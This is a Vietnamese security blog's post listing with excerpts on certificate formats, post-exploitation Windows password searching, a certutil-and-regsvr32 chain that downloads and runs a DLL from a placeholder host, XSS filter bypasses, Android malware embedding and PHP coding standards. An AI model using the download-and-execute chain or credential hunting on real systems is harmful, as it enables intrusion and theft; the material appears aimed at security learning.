Nhat Truong

Các định dạng tệp cho chứng chỉ số

Giới thiệu PKCS # 12 (còn được gọi là PKCS12 hoặc PFX) là định dạng nhị phân để lưu trữ chuỗi chứng chỉ và khóa riêng trong một tệp mã hóa duy nhất. Các tệp PKCS # 12 thường được sử dụng để nhập và xuất chứng chỉ và khóa riêng trên máy tính WindowsContinueContinue reading “Các định dạng tệp cho chứng chỉ số”

Sục sạo windows khi đã có shell?

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Tìm pass trong windows: Phong cách bình dân findstr /S /I /M /C:”search text” *.* Phong cách dânContinueContinue reading “Sục sạo windows khi đã có shell?”

Ngăn Chrome/Edge force sang https

edge://net-internals/#hsts

Cách search splunk tiếng việt

index=<index> | rex field=log “full_name\”\:\”(?<full_name>.*?)\”” | search “full_name”=”Trần Nhật Trường” | stats values(message)

[Note] tải file windows với Certutil

copy: http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html 1. Create your DLL 2. Base64encode it (optional) 3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down 4. Base64decode the file with certutil 5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll

Hacker nhúng mã độc vào trong ứng dụng Android như nào?

Bài viết hay note lại vào blog :D: https://blog.0x1115.org/2016/03/18/nhung-ma-doc-vao-trong-ung-dung-android/ “Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Đừng bao giờ cài đặt các ứng dụng đượcContinueContinue reading “Hacker nhúng mã độc vào trong ứng dụng Android như nào?”

Scan shell tool for BlackBox

Dò quét shell theo hướng blackbox #!/usr/bin/perl -w use strict; use warnings; #You will need these two modules installed use HTTP::Request; use LWP::UserAgent; #There’s different ways to install them on different OS, Google it system(($^O eq ‘MSWin32’) ? ‘cls’ : ‘clear’); #USAGE: perl scan.pl # ██████╗ █████╗ █████╗ ███████╗ ██████╗ █████╗ ███╗ ██╗ #██╔════╝██╔══██╗██╔══██╗ ██╔════╝██╔════╝██╔══██╗████╗ContinueContinue reading “Scan shell tool for BlackBox”

Một số cách bypass XSS filter

Sau đây là một số cách bypass XSS filter dị dị sưu tầm được, anh em có thể trải nghiệm. “Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phépContinueContinue reading “Một số cách bypass XSS filter”

Basic Coding Standard trong PHP

Chương này của bộ standard bao gồm những yếu tố cơ bản được đòi hỏi để có thể đảm bảo tính tương kết giữa code PHP được chia sẻ. 1. Khái quát chung Files chỉ được sử dụng tag là <?php và <?= . Files phải encode bằng UTF-8, không dùng BOM (byte-order mark) FilesContinueContinue reading “Basic Coding Standard trong PHP”

Hướng dẫn về Coding Style – Coding Style Guide

Bộ quy tắc này dựa trên và mở rộng từ PSR-1, basic coding standard Bộ quy tắc basic coding standard được tạo ra nhằm giảm bới những khó khăn trong việc đọc code của người khác. Nó thực hiện điều đó bằng cách đặt ra những quy định hay gợi ý về việc format PHPContinueContinue reading “Hướng dẫn về Coding Style – Coding Style Guide”